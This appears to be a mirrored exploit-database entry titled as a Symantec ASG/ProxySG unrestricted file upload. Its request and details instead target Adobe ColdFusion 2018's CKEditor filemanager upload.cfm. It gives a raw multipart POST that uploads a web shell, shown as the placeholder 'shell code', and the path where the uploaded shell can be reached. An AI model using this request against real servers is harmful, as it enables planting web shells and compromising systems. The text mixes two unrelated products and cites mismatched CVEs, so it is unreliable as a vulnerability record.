Symantec Advanced Secure Gateway (ASG) / ProxySG – Unrestricted File Upload - 体验盒子

作者： Pankaj Kumar Thakur

日期： 2019-09-16

类别：

webapps

平台：

cfm

来源：https://www.exploit-db.com/exploits/47392/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

===========Security Intelligence============

# Vendor Homepage: adobe.com

# Version: 2018

# Tested on: Adobe ColdFusion 2018

# Exploit Author: Pankaj Kumar Thakur (Nepal)

==========[Table of Contents]==============

* Overview

* Detailed description

* Thanks & Acknowledgements

* References

==========[Vulnerability Information]========

* Unrestricted file upload in Adobe ColdFusion 2018

* CWE-434

* Base Score: 6.8 MEDIUM

* Vector: AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H

=========[ Overview]=========================

* System Affected: Adobe ColdFusion 2018

* Impact: Unrestricted file upload

=====[ Detailed description]=================

Unrestricted file upload vulnerability in the Symantec Advanced Secure Gateway (ASG) and ProxySG management consoles. A malicious appliance administrator can upload arbitrary malicious files to the management console and trick another administrator user into downloading and executing malicious code.

Request

POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm

HTTP/1.1

Host: hostname:portno

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0

Content-Type: multipart/form-data;

Content-Length: 303

Connection: close

Upgrade-Insecure-Requests: 1

.

-----------------------------24464570528145

Content-Disposition: form-data; name="file"; filename="shell_file with extension"

Content-Type: image/jpeg

shell code

-----------------------------24464570528145

Content-Disposition: form-data; name="path"

.

After uploading shell, its located here

http://coldfusion:port/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/shell_file with extension

=====[ Thanks & Acknowledgements]========================================

* Acknowledged by Adobe

* Duplicate

* https://nvd.nist.gov/vuln/detail/CVE-2016-10258

* https://www.cvedetails.com/cve/CVE-2016-1713/

* https://www.openwall.com/lists/oss-security/2016/01/12/4

=====[ EOF ]===========================================================